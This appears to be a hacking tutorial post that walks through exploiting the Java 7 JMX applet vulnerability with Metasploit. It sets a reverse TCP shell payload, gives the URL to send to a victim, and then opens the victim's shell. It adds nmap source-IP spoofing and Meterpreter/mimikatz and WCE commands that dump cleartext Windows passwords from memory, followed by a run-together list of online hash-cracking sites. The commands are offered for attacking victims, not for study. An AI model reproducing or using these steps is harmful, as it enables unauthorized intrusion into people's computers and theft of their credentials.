JAVA APPLET JMX REMOTE CODE EXECUTION:-

This vulnerability is exploited in February 2013.Additionally, this module bypasses default security settings introduced in Java 7 Update 10 to run unsigned applet without displaying any warning to the user.

Any O.S. Which is running java 7 update 10 is exploitable. Just attacker require metasploit.

Open your terminal & type following code

msfconsole
use exploit/windows/browser/java_jre17_jmxbean_2
msf exploit (java_jre17_jmxbean_2)>set payload java/shell_reverse_tcp
msf exploit (java_jre17_jmxbean_2)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (java_jre17_jmxbean_2)>set srvhost 192.168.1.7 (This must be an address on the local machine)
msf exploit (java_jre17_jmxbean_2)>set uripath / (The Url to use for this exploit)
msf exploit (java_jre17_jmxbean_2)>exploit

Now an URL you should give to your victim http://192.168.1.7:8080/
Send link to victim. As soon as he clicked you got session. Type following command.

Sessions -l
sessions -i 1


Now you get victim `s shell.
Using nmap to change a source address. The commands used are:
nmap -iflist
...to get a list of available interfaces. When an interface is chosen (in this tutorial, eth0 is chosen) use the name of the interface in the next command:
nmap -e eth0 -S 192.168.1.100 192.168.1.109
...which will use the eth0 interface and spoof a source IP of 192.168.1.100, while scanning 192.168.1.109. Because the source address is spoofed, the return traffic from the target host will not be routed back to us. Thus, all ports will appear to be closed.


Get clear text password:-
Following are different methods to get clear text password of windows from metasploit.
(1)using mimikatz or wce get clear text password of victim.
(2) You can also use mimikatz password dump method .
(3)You can also use mimikatz meterpreter plugin.
meterpreter > load mimikatz
meterpreter > help mimikatz
meterpreter > kerberos
meterpreter > mimikatz_command -h
meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a “full”
(4)You can use wce & mimikatz in memory without uploading binary.
(a)WCE in memory:-
cd %systemroot%
cd system32
pwd
execute -H -m -d calc.exe -f /root/wce.exe -a “-o foo.txt
cat foo.txt
(b)Mimikatz in memory:-
cd %systemroot%
cd system32
execute -H -i -c -m -d calc.exe -f /root/mimi/Win32/mimikatz.exe -a ‘”sekurlsa::logonPasswords full” exit’
CrackerHashes
Tobtu50,529,455,839
TMTO36,436,233,567
MD5Decrypter(uk)8,700,000,000
OnlineHashCrack5,211,644,250
AuthSecu500,000,000



MD5th
400,000,000
NetMD5crack171,392,210
Kalkulators100,000,000
Rednoize76,834,449
Gromweb45,543,530
hash-cracker.com40,000,000
Crackfoo -NNC38,227,555
MD5Rainbow33,517,066
Digitalsun31,000,000
Sans20,264,963
Crackfor.me16,173,854
MD5-lookup8,796,772
MD5decrypter8,103,123
MD5-db5,500,000
MD5-decrypter3,400,000
HashCracking.ru3,585,150
Shalla2,218,319
Hash-Database1,635,062
MD5decryption1,300,000
Drasen568,064
MD5finder429,477
MD5pass327,497
Bokehman230,000
Shell-Storm154,994
AppspotMulti
NoisetteMulti
MD5crackMulti
KinginfetMulti
VHCTeam?
Longgie?
RAH-Labs?
Wordd?
Anqel?
CMD5?
web-security-services?
MD5online?
MD5.my-addr?
C0llision?
MD5hood?
Schwett?
TheKaine?
Fox21?



NTLM
CrackerHashes
MD5decrypter(uk)8,700,000,000
OnlineHashCrack5,211,644,250
hash-cracker.com40,000,000
Fox21?
LMCrack?
CMD5?



LM
CrackerHashes
OnlineHashCrack5,211,644,250
NiceNameCrew?
C0llision?
Fox21?



SHA1
CrackerHashes
MD5Decrypter(uk)8,700,000,000
Rednoize76,838,852
hash-cracker.com40,000,000
Sans20,264,963
SHA1-Lookup18,949,380
HashCracking.ru3,585,150
Hash-Database1,635,065
CMD5?
StringFunction?
Web-Security-Services?



SHA256-512
CrackerHashes
Hash-Database1,635,067
Shalla1,143,472



MySQL
CrackerHashes
OnlineHashCrack5,211,644,250
Hashcrack30,654,899
HashCracking.ru3,585,150